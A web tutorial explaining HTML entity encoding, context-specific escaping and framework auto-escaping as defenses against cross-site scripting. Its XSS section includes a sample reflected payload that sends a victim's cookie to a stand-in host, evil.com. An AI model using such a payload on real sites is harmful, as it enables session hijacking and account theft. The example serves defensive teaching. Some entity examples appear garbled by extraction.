Learn how HTML encoding works, which characters need escaping, and how to prevent XSS vulnerabilities through proper encoding.
HTML encoding — also called HTML escaping or HTML entity encoding — is the process of converting characters that have special meaning in HTML into their corresponding HTML entity representations. This ensures the characters are treated as literal text content rather than HTML syntax.
For example, the less-than sign < is used in HTML to begin tags. If you want to display the literal text <script> on a web page without it being interpreted as an HTML tag, you must encode it as <script>.
HTML encoding is not just a formatting concern — it is a critical security measure that prevents Cross-Site Scripting (XSS) attacks, one of the most common and dangerous web vulnerabilities.
The HTML specification identifies five characters that must be escaped when they appear in text content or attribute values:
| Character | Entity name | Numeric entity | When to escape |
|---|---|---|---|
< | < | < | Always in text content and attribute values |
> | > | > | In text content (technically optional but recommended) |
& | & | & | Always — must be escaped first |
" | " | " | In double-quoted attribute values |
' | ' | ' | In single-quoted attribute values |
The ampersand & must be escaped before anything else, because it begins entity sequences. If you escape < to < and then escape the resulting & to &, you get the wrong result (&lt; instead of <). Always escape & first.
HTML has hundreds of named entities for special characters. Here are the most commonly used:
| Character | Entity | Description |
|---|---|---|
| Non-breaking space | Prevents line break between words |
— | — | Em dash |
– | – | En dash |
“ | " | Left double quotation mark |
” | " | Right double quotation mark |
‘ | ' | Left single quotation mark |
’ | ' | Right single quotation mark |
… | … | Horizontal ellipsis |
© | © | Copyright sign |
® | ® | Registered trademark |
™ | ™ | Trademark sign |
| Character | Entity | Description |
|---|---|---|
× | × | Multiplication sign |
÷ | ÷ | Division sign |
± | ± | Plus-minus sign |
≠ | ≠ | Not equal to |
≤ | ≤ | Less-than or equal to |
≥ | ≥ | Greater-than or equal to |
∞ | ∞ | Infinity |
» | » | Right-pointing double angle quotation mark |
Cross-Site Scripting (XSS) is a class of attack where an attacker injects malicious scripts into web pages viewed by other users. HTML encoding is the primary defense.
Imagine a search page that displays the search query back to the user:
<!-- Unsafe: directly inserting user input into HTML -->
<p>You searched for: <?= $_GET["q"] ?></p>
If an attacker sends a link with ?q=<script>document.location="https://evil.com/steal?c="+document.cookie</script>, the server outputs:
<p>You searched for: <script>document.location="https://evil.com/steal?c="+document.cookie</script></p>
The victim's browser executes the script, sending their session cookie to the attacker.
With HTML encoding:
<!-- Safe: encoding the output -->
<p>You searched for: <?= htmlspecialchars($_GET["q"], ENT_QUOTES, "UTF-8") ?></p>
The output becomes:
<p>You searched for: <script>document.location="https://evil.com/steal?c="+document.cookie</script></p>
This displays as literal text — harmless.
Stored (persistent) XSS is similar but the malicious input is saved to a database and shown to all users. For example, a comment on a blog post. The same defense applies: HTML-encode all user-provided content before inserting it into HTML.
HTML encoding is not one-size-fits-all. The correct encoding depends on where in the HTML document you are inserting data:
Escape <, >, and &:
<p>User said: <b>Hello</b></p>
Escape <, >, &, and the quote character used:
<input value="<script>&hello</script>">
Do NOT use HTML encoding for data inserted into JavaScript. Use JSON encoding or a JavaScript-specific escaping function. HTML encoding in JavaScript context does not prevent XSS.
<!-- WRONG: HTML encoding in JS context -->
<script>var name = "<script>";</script>
<!-- RIGHT: JSON encoding for JS context -->
<script>var name = <?= json_encode($name) ?>;</script>
Use URL percent-encoding, not HTML encoding, for values inserted into URLs. Then HTML-encode the entire attribute value.
<a href="https://example.com/search?q=<?= htmlspecialchars(urlencode($query)) ?>">Search</a>
Avoid inserting user data into CSS. If unavoidable, use CSS-specific encoding. HTML encoding is not sufficient.
// htmlspecialchars is the correct function for HTML context
$safe = htmlspecialchars($userInput, ENT_QUOTES | ENT_HTML5, "UTF-8")
// htmlentities encodes all characters that have entity equivalents (overkill for most uses)
$safe = htmlentities($userInput, ENT_QUOTES | ENT_HTML5, "UTF-8")
function escapeHtml(str) {
const div = document.createElement("div")
div.appendChild(document.createTextNode(str))
return div.innerHTML
}
// Or using the DOM to set text content directly (no escaping needed):
element.textContent = userInput // Safe, no encoding needed
// element.innerHTML = userInput // UNSAFE - use textContent instead
from html import escape, unescape
safe = escape("<script>alert(1)</script>", quote=True)
print(safe)
# => <script>alert(1)</script>
original = unescape("<script>alert(1)</script>")
print(original)
# => <script>alert(1)</script>
// Using the he library (npm install he)
const he = require("he")
const encoded = he.encode("<script>alert(1)</script>")
// => "<script>alert(1)</script>"
const decoded = he.decode("<script>alert(1)</script>")
// => "<script>alert(1)</script>"
These three encodings are often confused:
| Encoding | Purpose | Example input | Example output |
|---|---|---|---|
| HTML encoding | Safely embed text in HTML | <script> | <script> |
| URL encoding | Safely embed data in URLs | hello world | hello%20world |
| Base64 | Encode binary data as text | Binary bytes | SGVsbG8= |
They serve completely different purposes and are not interchangeable. Using URL encoding where HTML encoding is needed (or vice versa) is a common mistake that can lead to either display corruption or security vulnerabilities.
Most modern web frameworks and templating engines auto-escape HTML by default:
{expression} by default. Use dangerouslySetInnerHTML only for trusted HTML.{{ expression }} auto-escapes. Use v-html only for trusted HTML.{% autoescape off %} or |safe only for trusted content.autoescape=True. Use |safe filter only for trusted content.{{ expression }} auto-escapes. Use {{{ expression }}} for raw HTML.Auto-escaping dramatically reduces the risk of XSS, but you still need to understand the underlying mechanism. Every dangerouslySetInnerHTML, v-html, or |safe usage is a potential XSS vulnerability if it includes untrusted input.
Whether you need to safely embed user content in HTML, decode an HTML-encoded string you received from an API, or debug XSS protections, the HTML Encoder and Decoder on utils.live handle it instantly in your browser.
Free, browser-based tools — no sign-up required, your data never leaves your device.